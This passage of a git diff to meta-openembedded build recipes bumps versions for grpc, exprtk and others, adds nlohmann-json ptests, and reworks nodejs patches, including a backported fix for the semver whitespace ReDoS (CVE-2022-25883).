"87d8f0961a01bf09bef98ff89bae9fdec42181ee" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/exprtk/exprtk_git.bb b/meta-oe/recipes-devtools/exprtk/exprtk_git.bb index 52975c8215..4019f26899 100644 --- a/meta-oe/recipes-devtools/exprtk/exprtk_git.bb +++ b/meta-oe/recipes-devtools/exprtk/exprtk_git.bb @@ -3,9 +3,9 @@ HOMEPAGE = "https://github.com/ArashPartow/exprtk" SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRCREV = "281c2ccc65b8f91c012ea3725ebcef406378a225" +SRCREV = "f46bffcd6966d38a09023fb37ba9335214c9b959" -SRC_URI = "git://github.com/ArashPartow/exprtk.git;branch=master;protocol=https" +SRC_URI = "git://github.com/ArashPartow/exprtk.git;branch=release;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb b/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb index bf74f1229f..44478ea0b2 100644 --- a/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb +++ b/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb @@ -25,12 +25,17 @@ BUILD_CXXFLAGS += "-fPIC" # BUILD_TYPE=Release is required, otherwise flatc is not installed EXTRA_OECMAKE += "\ -DCMAKE_BUILD_TYPE=Release \ - -DFLATBUFFERS_BUILD_TESTS=OFF \ + -DFLATBUFFERS_BUILD_TESTS=OFF \ -DFLATBUFFERS_BUILD_SHAREDLIB=ON \ " inherit cmake +rm_flatc_cmaketarget_for_target() { + rm -f "${SYSROOT_DESTDIR}/${libdir}/cmake/flatbuffers/FlatcTargets.cmake" +} +SYSROOT_PREPROCESS_FUNCS:class-target += "rm_flatc_cmaketarget_for_target" + do_install:append() { install -d ${D}${PYTHON_SITEPACKAGES_DIR} cp -rf ${S}/python/flatbuffers ${D}${PYTHON_SITEPACKAGES_DIR} diff --git a/meta-oe/recipes-devtools/grpc/grpc_1.45.2.bb b/meta-oe/recipes-devtools/grpc/grpc_1.46.7.bb index c2f952fc64..ab6f6e46cd 100644 --- a/meta-oe/recipes-devtools/grpc/grpc_1.45.2.bb +++ b/meta-oe/recipes-devtools/grpc/grpc_1.46.7.bb @@ -20,8 +20,8 @@ RDEPENDS:${PN}-dev:append:class-native = " ${PN}-compiler" # RDEPENDS:${PN}-dev += "${PN}-compiler" S = "${WORKDIR}/git" -SRCREV_grpc = "b39ffcc425ea990a537f98ec6fe6a1dcb90470d7" -BRANCH = "v1.45.x" +SRCREV_grpc = "02384e39185f109bd299eb8482306229967dc970" +BRANCH = "v1.46.x" SRC_URI = "git://github.com/grpc/grpc.git;protocol=https;name=grpc;branch=${BRANCH} \ file://0001-Revert-Changed-GRPCPP_ABSEIL_SYNC-to-GPR_ABSEIL_SYNC.patch \ file://0001-cmake-add-separate-export-for-plugin-targets.patch \ @@ -66,3 +66,6 @@ FILES:${PN}-compiler += " \ ${bindir} \ ${libdir}/libgrpc_plugin_support${SOLIBS} \ " + +# this CVE was introduced in v1.53.0 and not backported to v1.46.x branch +CVE_CHECK_IGNORE += "CVE-2023-32732" diff --git a/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb b/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb index 29937e26d0..be2c0f5394 100644 --- a/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb +++ b/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb @@ -29,4 +29,4 @@ EXTRA_OECMAKE += "-DHEAPTRACK_BUILD_GUI=OFF" COMPATIBLE_HOST:riscv32 = "null" COMPATIBLE_HOST:riscv64 = "null" -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb b/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb index c82761ac34..87d51d8a4d 100644 --- a/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb +++ b/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb @@ -17,6 +17,9 @@ SRCREV = "aa631b4b4bd13f6ae2dbab9ae9da209e1e05b0fc" SRC_URI = "git://github.com/Reference-LAPACK/lapack.git;protocol=https;branch=master" S = "${WORKDIR}/git" +PACKAGECONFIG ?= "" +PACKAGECONFIG[lapacke] = "-DLAPACKE=ON,-DLAPACKE=OFF" + EXTRA_OECMAKE = " -DBUILD_SHARED_LIBS=ON " OECMAKE_GENERATOR = "Unix Makefiles" diff --git a/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest b/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest new file mode 100755 index 0000000000..2f00267d50 --- /dev/null +++ b/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest @@ -0,0 +1,12 @@ +#!/bin/sh + +cd tests +for atest in test-* ; do + rm -rf tests.log + ./${atest} > tests.log 2>&1 + if [ $? = 0 ] ; then + echo "PASS: ${atest}" + else + echo "FAIL: ${atest}" + fi +done diff --git a/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb b/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb index 0cf6fd36bc..8c45949142 100644 --- a/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb +++ b/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb @@ -6,23 +6,37 @@ LIC_FILES_CHKSUM = "file://LICENSE.MIT;md5=f969127d7b7ed0a8a63c2bbeae002588" CVE_PRODUCT = "json-for-modern-cpp" -SRC_URI = "git://github.com/nlohmann/json.git;nobranch=1;protocol=https \ - " +SRC_URI = "git://github.com/nlohmann/json.git;branch=develop;protocol=https \ + git://github.com/nlohmann/json_test_data.git;destsuffix=git/json_test_data;name=json-test-data;branch=master;protocol=https \ + file://run-ptest \ +" SRCREV = "4f8fba14066156b73f1189a2b8bd568bde5284c5" +SRCREV_json-test-data = "a1375cea09d27cc1c4cadb8d00470375b421ac37" + +SRCREV_FORMAT = "json-test-data" S = "${WORKDIR}/git" -inherit cmake +inherit cmake ptest -EXTRA_OECMAKE += "-DJSON_BuildTests=OFF" +EXTRA_OECMAKE += "${@bb.utils.contains('PTEST_ENABLED', '1', '-DJSON_BuildTests=ON -DJSON_TestDataDirectory=${PTEST_PATH}/json_test_data', '-DJSON_BuildTests=OFF', d)}" # nlohmann-json is a header only C++ library, so the main package will be empty. - +ALLOW_EMPTY:${PN} = "1" RDEPENDS:${PN}-dev = "" +RDEPENDS:${PN}-ptest = "perl" BBCLASSEXTEND = "native nativesdk" + +do_install_ptest () { + install -d ${D}${PTEST_PATH}/tests + cp -r ${S}/json_test_data/ ${D}${PTEST_PATH}/ + cp -r ${B}/test/test-* ${D}${PTEST_PATH}/tests +} + + # other packages commonly reference the file directly as "json.hpp" # create symlink to allow this usage do_install:append() { diff --git a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.14/oe-npm-cache b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.20/oe-npm-cache index f596207648..f596207648 100755 --- a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.14/oe-npm-cache +++ b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.20/oe-npm-cache diff --git a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.14.bb b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.20.bb index a61dd5018f..a61dd5018f 100644 --- a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.14.bb +++ b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.20.bb diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch new file mode 100644 index 0000000000..1f54d444d7 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch @@ -0,0 +1,35 @@ +From 70a008c59992b0ac6a868530bc3e249b7777ab95 Mon Sep 17 00:00:00 2001 +From: Archana Polampalli <archana.polampalli@windriver.com> +Date: Fri, 16 Dec 2022 05:19:06 +0000 +Subject: [PATCH] Nodejs: Fixed pipes DeprecationWarning + +DeprecationWarning: 'pipes' is deprecated and slated for removal in Python 3.13 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + configure.py | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/configure.py b/configure.py +index d3192ca04c..8d279220fd 100755 +--- a/configure.py ++++ b/configure.py +@@ -5,7 +5,6 @@ import sys + import errno + import argparse + import os +-import pipes + import pprint + import re + import shlex +@@ -2041,7 +2040,7 @@ write('config.gypi', do_not_edit + + pprint.pformat(output, indent=2, width=1024) + '\n') + + write('config.status', '#!/bin/sh\nset -x\nexec ./configure ' + +- ' '.join([pipes.quote(arg) for arg in original_argv]) + '\n') ++ ' '.join([shlex.quote(arg) for arg in original_argv]) + '\n') + os.chmod('config.status', 0o775) + + +-- +2.34.1 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Using-native-binaries.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Using-native-binaries.patch index 8db1f1dd54..445aaf8398 100644 --- a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Using-native-binaries.patch +++ b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Using-native-binaries.patch @@ -3,14 +3,17 @@ From: Guillaume Burel <guillaume.burel@stormshield.eu> Date: Fri, 3 Jan 2020 11:25:54 +0100 Subject: [PATCH] Using native binaries +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> --- - node.gyp | 4 ++-- - tools/v8_gypfiles/v8.gyp | 11 ++++------- - 2 files changed, 6 insertions(+), 9 deletions(-) + node.gyp | 2 ++ + tools/v8_gypfiles/v8.gyp | 5 +++++ + 2 files changed, 7 insertions(+) +diff --git a/node.gyp b/node.gyp +index 24505da7ba..7d41bd52db 100644 --- a/node.gyp +++ b/node.gyp -@@ -294,6 +294,7 @@ +@@ -319,6 +319,7 @@ 'action_name': 'run_mkcodecache', 'process_outputs_as_sources': 1, 'inputs': [ @@ -18,14 +21,16 @@ Subject: [PATCH] Using native binaries '<(mkcodecache_exec)', ], 'outputs': [ -@@ -319,6 +320,7 @@ - 'action_name': 'node_mksnapshot', - 'process_outputs_as_sources': 1, - 'inputs': [ -+ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', - '<(node_mksnapshot_exec)', - ], - 'outputs': [ +@@ -366,6 +367,7 @@ + 'action_name': 'node_mksnapshot', + 'process_outputs_as_sources': 1, + 'inputs': [ ++ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', + '<(node_mksnapshot_exec)', + ], + 'outputs': [ +diff --git a/tools/v8_gypfiles/v8.gyp b/tools/v8_gypfiles/v8.gyp +index ed042f8829..371b8e02c2 100644 --- a/tools/v8_gypfiles/v8.gyp +++ b/tools/v8_gypfiles/v8.gyp @@ -68,6 +68,7 @@ @@ -40,11 +45,11 @@ Subject: [PATCH] Using native binaries '<@(torque_outputs_inc)', ], 'action': [ -+ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', ++ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)torque<(EXECUTABLE_SUFFIX)', '-o', '<(SHARED_INTERMEDIATE_DIR)/torque-generated', '-v8-root', '<(V8_ROOT)', -@@ -225,6 +227,7 @@ +@@ -211,6 +213,7 @@ { 'action_name': 'generate_bytecode_builtins_list_action', 'inputs': [ @@ -52,7 +57,7 @@ Subject: [PATCH] Using native binaries '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)bytecode_builtins_list_generator<(EXECUTABLE_SUFFIX)', ], 'outputs': [ -@@ -415,6 +418,7 @@ +@@ -395,6 +398,7 @@ ], }, 'inputs': [ @@ -60,7 +65,7 @@ Subject: [PATCH] Using native binaries '<(mksnapshot_exec)', ], 'outputs': [ -@@ -1548,6 +1552,7 @@ +@@ -1513,6 +1517,7 @@ { 'action_name': 'run_gen-regexp-special-case_action', 'inputs': [ @@ -68,3 +73,6 @@ Subject: [PATCH] Using native binaries '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)gen-regexp-special-case<(EXECUTABLE_SUFFIX)', ], 'outputs': [ +-- +2.34.1 + diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch deleted file mode 100644 index 5cb2e97015..0000000000 --- a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch +++ /dev/null @@ -1,96 +0,0 @@ -From 62ddf8499747fb1e366477d666c0634ad50039a9 Mon Sep 17 00:00:00 2001 -From: Elliott Sales de Andrade <quantum.analyst@gmail.com> -Date: Tue, 19 Mar 2019 23:22:40 -0400 -Subject: [PATCH 2/2] Install both binaries and use libdir. - -This allows us to build with a shared library for other users while -still providing the normal executable. - -Taken from - https://src.fedoraproject.org/rpms/nodejs/raw/rawhide/f/0002-Install-both-binaries-and-use-libdir.patch - -Upstream-Status: Pending - -Signed-off-by: Elliott Sales de Andrade <quantum.analyst@gmail.com> -Signed-off-by: Andreas Müller <schnitzeltony@gmail.com> -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - configure.py | 7 +++++++ - tools/install.py | 21 +++++++++------------ - 2 files changed, 16 insertions(+), 12 deletions(-) - -diff --git a/configure.py b/configure.py -index 6efb98c2316f089f3167e486282593245373af3f..a6d2ec939e4480dfae703f3978067537abf9f0f0 100755 ---- a/configure.py -+++ b/configure.py -@@ -721,10 +721,16 @@ parser.add_argument('--shared', - dest='shared', - default=None, - help='compile shared library for embedding node in another project. ' + - '(This mode is not officially supported for regular applications)') - -+parser.add_argument('--libdir', -+ action='store', -+ dest='libdir', -+ default='lib', -+ help='a directory to install the shared library into') -+ - parser.add_argument('--without-v8-platform', - action='store_true', - dest='without_v8_platform', - default=False, - help='do not initialize v8 platform during node.js startup. ' + -@@ -1305,10 +1311,11 @@ def configure_node(o): - o['variables']['debug_nghttp2'] = 'false' - - o['variables']['node_no_browser_globals'] = b(options.no_browser_globals) - - o['variables']['node_shared'] = b(options.shared) -+ o['variables']['libdir'] = options.libdir - node_module_version = getmoduleversion.get_version() - - if options.dest_os == 'android': - shlib_suffix = 'so' - elif sys.platform == 'darwin': -diff --git a/tools/install.py b/tools/install.py -index 41cc1cbc60a9480cc08df3aa0ebe582c2becc3a2..11208f9e7166ab60da46d5ace2257c239a7e9263 100755 ---- a/tools/install.py -+++ b/tools/install.py -@@ -128,26 +128,23 @@ def subdir_files(path, dest, action): - for subdir, files_in_path in ret.items(): - action(files_in_path, subdir + '/') - - def files(action): - is_windows = sys.platform == 'win32' -- output_file = 'node' - output_prefix = 'out/Release/' -+ output_libprefix = output_prefix - -- if 'false' == variables.get('node_shared'): -- if is_windows: -- output_file += '.exe' -+ if is_windows: -+ output_bin = 'node.exe' -+ output_lib = 'node.dll' - else: -- if is_windows: -- output_file += '.dll' -- else: -- output_file = 'lib' + output_file + '.' + variables.get('shlib_suffix') -+ output_bin = 'node' -+ output_lib = 'libnode.' + variables.get('shlib_suffix') - -- if 'false' == variables.get('node_shared'): -- action([output_prefix + output_file], 'bin/' + output_file) -- else: -- action([output_prefix + output_file], 'lib/' + output_file) -+ action([output_prefix + output_bin], 'bin/' + output_bin) -+ if 'true' == variables.get('node_shared'): -+ action([output_libprefix + output_lib], variables.get('libdir') + '/' + output_lib) - - if 'true' == variables.get('node_use_dtrace'): - action(['out/Release/node.d'], 'lib/dtrace/node.d') - - # behave similarly for systemtap --- -2.33.0 - diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch deleted file mode 100644 index 4d238c03f4..0000000000 --- a/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch +++ /dev/null @@ -1,151 +0,0 @@ -From 86d1c0cc6a5dcf57e413a1cc1c29203e87cf9a14 Mon Sep 17 00:00:00 2001 -From: Daniel Bevenius <daniel.bevenius@gmail.com> -Date: Sat, 16 Oct 2021 08:50:16 +0200 -Subject: [PATCH] src: add --openssl-legacy-provider option - -This commit adds an option to Node.js named --openssl-legacy-provider -and if specified will load OpenSSL 3.0 Legacy provider. - -$ ./node --help -... ---openssl-legacy-provider enable OpenSSL 3.0 legacy provider - -Example usage: - -$ ./node --openssl-legacy-provider -p 'crypto.createHash("md4")' -Hash { - _options: undefined, - [Symbol(kHandle)]: Hash {}, - [Symbol(kState)]: { [Symbol(kFinalized)]: false } -} - -Co-authored-by: Richard Lau <rlau@redhat.com> -Signed-off-by: Signed-off-by: Andrej Valek <andrej.valek@siemens.com> -Upstream-Status: Backport [https://github.com/nodejs/node/issues/40455] ---- - doc/api/cli.md | 10 ++++++++++ - src/crypto/crypto_util.cc | 10 ++++++++++ - src/node_options.cc | 10 ++++++++++ - src/node_options.h | 7 +++++++ - .../test-process-env-allowed-flags-are-documented.js | 5 +++++ - 5 files changed, 42 insertions(+) - -diff --git a/doc/api/cli.md b/doc/api/cli.md -index 74057706bf8d..608b9cdeddf1 100644 ---- a/doc/api/cli.md -+++ b/doc/api/cli.md -@@ -687,6 +687,14 @@ Load an OpenSSL configuration file on startup. Among other uses, this can be - used to enable FIPS-compliant crypto if Node.js is built - against FIPS-enabled OpenSSL. - -+### `--openssl-legacy-provider` -+<!-- YAML -+added: REPLACEME -+--> -+ -+Enable OpenSSL 3.0 legacy provider. For more information please see -+[providers readme][]. -+ - ### `--pending-deprecation` - - <!-- YAML -@@ -1544,6 +1552,7 @@ Node.js options that are allowed are: - * `--no-warnings` - * `--node-memory-debug` - * `--openssl-config` -+* `--openssl-legacy-provider` - * `--pending-deprecation` - * `--policy-integrity` - * `--preserve-symlinks-main` -@@ -1933,6 +1942,7 @@ $ node --max-old-space-size=1536 index.js - [emit_warning]: process.md#processemitwarningwarning-options - [jitless]: https://v8.dev/blog/jitless - [libuv threadpool documentation]: https://docs.libuv.org/en/latest/threadpool.html -+[providers readme]: https://github.com/openssl/openssl/blob/openssl-3.0.0/README-PROVIDERS.md - [remote code execution]: https://www.owasp.org/index.php/Code_Injection - [security warning]: #warning-binding-inspector-to-a-public-ipport-combination-is-insecure - [timezone IDs]: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones -diff --git a/src/crypto/crypto_util.cc b/src/crypto/crypto_util.cc -index 7e0c8ba3eb60..796ea3025e41 100644 ---- a/src/crypto/crypto_util.cc -+++ b/src/crypto/crypto_util.cc -@@ -148,6 +148,16 @@ void InitCryptoOnce() { - } - #endif - -+#if OPENSSL_VERSION_MAJOR >= 3 -+ // --openssl-legacy-provider -+ if (per_process::cli_options->openssl_legacy_provider) { -+ OSSL_PROVIDER* legacy_provider = OSSL_PROVIDER_load(nullptr, "legacy"); -+ if (legacy_provider == nullptr) { -+ fprintf(stderr, "Unable to load legacy provider.\n"); -+ } -+ } -+#endif -+ - OPENSSL_init_ssl(0, settings); - OPENSSL_INIT_free(settings); - settings = nullptr; -diff --git a/src/node_options.cc b/src/node_options.cc -index 00bdc6688a4c..3363860919a9 100644 ---- a/src/node_options.cc -+++ b/src/node_options.cc -@@ -4,6 +4,9 @@ - #include "env-inl.h" - #include "node_binding.h" - #include "node_internals.h" -+#if HAVE_OPENSSL -+#include "openssl/opensslv.h" -+#endif - - #include <errno.h> - #include <sstream> -diff --git a/src/node_options.h b/src/node_options.h -index fd772478d04d..1c0e018ab16f 100644 ---- a/src/node_options.h -+++ b/src/node_options.h -@@ -11,6 +11,10 @@ - #include "node_mutex.h" - #include "util.h" - -+#if HAVE_OPENSSL -+#include "openssl/opensslv.h" -+#endif -+ - namespace node { - - class HostPort { -@@ -251,6 +255,9 @@ class PerProcessOptions : public Options { - bool enable_fips_crypto = false; - bool force_fips_crypto = false; - #endif -+#if OPENSSL_VERSION_MAJOR >= 3 -+ bool openssl_legacy_provider = false; -+#endif - - // Per-process because reports can be triggered outside a known V8 context. - bool report_on_fatalerror = false; -diff --git a/test/parallel/test-process-env-allowed-flags-are-documented.js b/test/parallel/test-process-env-allowed-flags-are-documented.js -index 64626b71f019..8a4e35997907 100644 ---- a/test/parallel/test-process-env-allowed-flags-are-documented.js -+++ b/test/parallel/test-process-env-allowed-flags-are-documented.js -@@ -43,6 +43,10 @@ for (const line of [...nodeOptionsLines, ...v8OptionsLines]) { - } - } - -+if (!common.hasOpenSSL3) { -+ documented.delete('--openssl-legacy-provider'); -+} -+ - // Filter out options that are conditionally present. - const conditionalOpts = [ - { -@@ -50,6 +54,7 @@ const conditionalOpts = [ - filter: (opt) => { - return [ - '--openssl-config', -+ common.hasOpenSSL3 ? '--openssl-legacy-provider' : '', - '--tls-cipher-list', - '--use-bundled-ca', - '--use-openssl-ca', - diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch new file mode 100644 index 0000000000..4c73b556f9 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch @@ -0,0 +1,262 @@ +From 717534ee353682f3bcf33e60a8af4292626d4441 Mon Sep 17 00:00:00 2001 +From: Luke Karrys <luke@lukekarrys.com> +Date: Thu, 15 Jun 2023 12:21:14 -0700 +Subject: [PATCH] fix: better handling of whitespace (#564) + +CVE: CVE-2022-25883 + +Upstream-Status: Backport [https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../node_modules/semver/classes/comparator.js | 3 +- + deps/npm/node_modules/semver/classes/range.js | 64 +++++++++++-------- + .../npm/node_modules/semver/classes/semver.js | 2 +- + .../node_modules/semver/functions/coerce.js | 2 +- + deps/npm/node_modules/semver/internal/re.js | 11 ++++ + deps/npm/node_modules/semver/package.json | 2 +- + 6 files changed, 53 insertions(+), 31 deletions(-) + +diff --git a/deps/npm/node_modules/semver/classes/comparator.js b/deps/npm/node_modules/semver/classes/comparator.js +index 62cd204..c909446 100644 +--- a/deps/npm/node_modules/semver/classes/comparator.js ++++ b/deps/npm/node_modules/semver/classes/comparator.js +@@ -16,6 +16,7 @@ class Comparator { + } + } + ++ comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose +@@ -129,7 +130,7 @@ class Comparator { + module.exports = Comparator + + const parseOptions = require('../internal/parse-options') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + const cmp = require('../functions/cmp') + const debug = require('../internal/debug') + const SemVer = require('./semver') +diff --git a/deps/npm/node_modules/semver/classes/range.js b/deps/npm/node_modules/semver/classes/range.js +index 7dc24bc..8e2e1f9 100644 +--- a/deps/npm/node_modules/semver/classes/range.js ++++ b/deps/npm/node_modules/semver/classes/range.js +@@ -26,19 +26,26 @@ class Range { + this.loose = !!options.loose + this.includePrerelease = !!options.includePrerelease + +- // First, split based on boolean or || ++ // First reduce all whitespace as much as possible so we do not have to rely ++ // on potentially slow regexes like \s*. This is then stored and used for ++ // future error messages as well. + this.raw = range +- this.set = range ++ .trim() ++ .split(/\s+/) ++ .join(' ') ++ ++ // First, split on || ++ this.set = this.raw + .split('||') + // map the range to a 2d array of comparators +- .map(r => this.parseRange(r.trim())) ++ .map(r => this.parseRange(r)) + // throw out any comparator lists that are empty + // this generally means that it was not a valid range, which is allowed + // in loose mode, but will still throw if the WHOLE range is invalid. + .filter(c => c.length) + + if (!this.set.length) { +- throw new TypeError(`Invalid SemVer Range: ${range}`) ++ throw new TypeError(`Invalid SemVer Range: ${this.raw}`) + } + + // if we have any that are not the null set, throw out null sets. +@@ -64,9 +71,7 @@ class Range { + + format () { + this.range = this.set +- .map((comps) => { +- return comps.join(' ').trim() +- }) ++ .map((comps) => comps.join(' ').trim()) + .join('||') + .trim() + return this.range +@@ -77,8 +82,6 @@ class Range { + } + + parseRange (range) { +- range = range.trim() +- + // memoize range parsing for performance. + // this is a very hot path, and fully deterministic. + const memoOpts = Object.keys(this.options).join(',') +@@ -103,9 +106,6 @@ class Range { + // `^ 1.2.3` => `^1.2.3` + range = range.replace(re[t.CARETTRIM], caretTrimReplace) + +- // normalize spaces +- range = range.split(/\s+/).join(' ') +- + // At this point, the range is completely trimmed and + // ready to be split into comparators. + +@@ -200,7 +200,7 @@ const Comparator = require('./comparator') + const debug = require('../internal/debug') + const SemVer = require('./semver') + const { +- re, ++ safeRe: re, + t, + comparatorTrimReplace, + tildeTrimReplace, +@@ -252,10 +252,13 @@ const isX = id => !id || id.toLowerCase() === 'x' || id === '*' + // ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0-0 + // ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0-0 + // ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0-0 +-const replaceTildes = (comp, options) => +- comp.trim().split(/\s+/).map((c) => { +- return replaceTilde(c, options) +- }).join(' ') ++const replaceTildes = (comp, options) => { ++ return comp ++ .trim() ++ .split(/\s+/) ++ .map((c) => replaceTilde(c, options)) ++ .join(' ') ++} + + const replaceTilde = (comp, options) => { + const r = options.loose ? re[t.TILDELOOSE] : re[t.TILDE] +@@ -291,10 +294,13 @@ const replaceTilde = (comp, options) => { + // ^1.2, ^1.2.x --> >=1.2.0 <2.0.0-0 + // ^1.2.3 --> >=1.2.3 <2.0.0-0 + // ^1.2.0 --> >=1.2.0 <2.0.0-0 +-const replaceCarets = (comp, options) => +- comp.trim().split(/\s+/).map((c) => { +- return replaceCaret(c, options) +- }).join(' ') ++const replaceCarets = (comp, options) => { ++ return comp ++ .trim() ++ .split(/\s+/) ++ .map((c) => replaceCaret(c, options)) ++ .join(' ') ++} + + const replaceCaret = (comp, options) => { + debug('caret', comp, options) +@@ -351,9 +357,10 @@ const replaceCaret = (comp, options) => { + + const replaceXRanges = (comp, options) => { + debug('replaceXRanges', comp, options) +- return comp.split(/\s+/).map((c) => { +- return replaceXRange(c, options) +- }).join(' ') ++ return comp ++ .split(/\s+/) ++ .map((c) => replaceXRange(c, options)) ++ .join(' ') + } + + const replaceXRange = (comp, options) => { +@@ -436,12 +443,15 @@ const replaceXRange = (comp, options) => { + const replaceStars = (comp, options) => { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! +- return comp.trim().replace(re[t.STAR], '') ++ return comp ++ .trim() ++ .replace(re[t.STAR], '') + } + + const replaceGTE0 = (comp, options) => { + debug('replaceGTE0', comp, options) +- return comp.trim() ++ return comp ++ .trim() + .replace(re[options.includePrerelease ? t.GTE0PRE : t.GTE0], '') + } + +@@ -479,7 +489,7 @@ const hyphenReplace = incPr => ($0, + to = `<=${to}` + } + +- return (`${from} ${to}`).trim() ++ return `${from} ${to}`.trim() + } + + const testSet = (set, version, options) => { +diff --git a/deps/npm/node_modules/semver/classes/semver.js b/deps/npm/node_modules/semver/classes/semver.js +index af62955..ad4e877 100644 +--- a/deps/npm/node_modules/semver/classes/semver.js ++++ b/deps/npm/node_modules/semver/classes/semver.js +@@ -1,6 +1,6 @@ + const debug = require('../internal/debug') + const { MAX_LENGTH, MAX_SAFE_INTEGER } = require('../internal/constants') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + + const parseOptions = require('../internal/parse-options') + const { compareIdentifiers } = require('../internal/identifiers') +diff --git a/deps/npm/node_modules/semver/functions/coerce.js b/deps/npm/node_modules/semver/functions/coerce.js +index 2e01452..febbff9 100644 +--- a/deps/npm/node_modules/semver/functions/coerce.js ++++ b/deps/npm/node_modules/semver/functions/coerce.js +@@ -1,6 +1,6 @@ + const SemVer = require('../classes/semver') + const parse = require('./parse') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + + const coerce = (version, options) => { + if (version instanceof SemVer) { +diff --git a/deps/npm/node_modules/semver/internal/re.js b/deps/npm/node_modules/semver/internal/re.js +index ed88398..f73ef1a 100644 +--- a/deps/npm/node_modules/semver/internal/re.js ++++ b/deps/npm/node_modules/semver/internal/re.js +@@ -4,16 +4,27 @@ exports = module.exports = {} + + // The actual regexps go on exports.re + const re = exports.re = [] ++const safeRe = exports.safeRe = [] + const src = exports.src = [] + const t = exports.t = {} + let R = 0 + + const createToken = (name, value, isGlobal) => { ++ // Replace all greedy whitespace to prevent regex dos issues. These regex are ++ // used internally via the safeRe object since all inputs in this library get ++ // normalized first to trim and collapse all extra whitespace. The original ++ // regexes are exported for userland consumption and lower level usage. A ++ // future breaking change could export the safer regex only with a note that ++ // all input should have extra whitespace removed. ++ const safe = value ++ .split('\\s*').join('\\s{0,1}') ++ .split('\\s+').join('\\s') + const index = R++ + debug(name, index, value) + t[name] = index + src[index] = value + re[index] = new RegExp(value, isGlobal ? 'g' : undefined) ++ safeRe[index] = new RegExp(safe, isGlobal ? 'g' : undefined) + } + + // The following Regular Expressions can be used for tokenizing, +diff --git a/deps/npm/node_modules/semver/package.json b/deps/npm/node_modules/semver/package.json +index 7898f59..d8ae619 100644 +--- a/deps/npm/node_modules/semver/package.json ++++ b/deps/npm/node_modules/semver/package.json +@@ -40,7 +40,7 @@ + 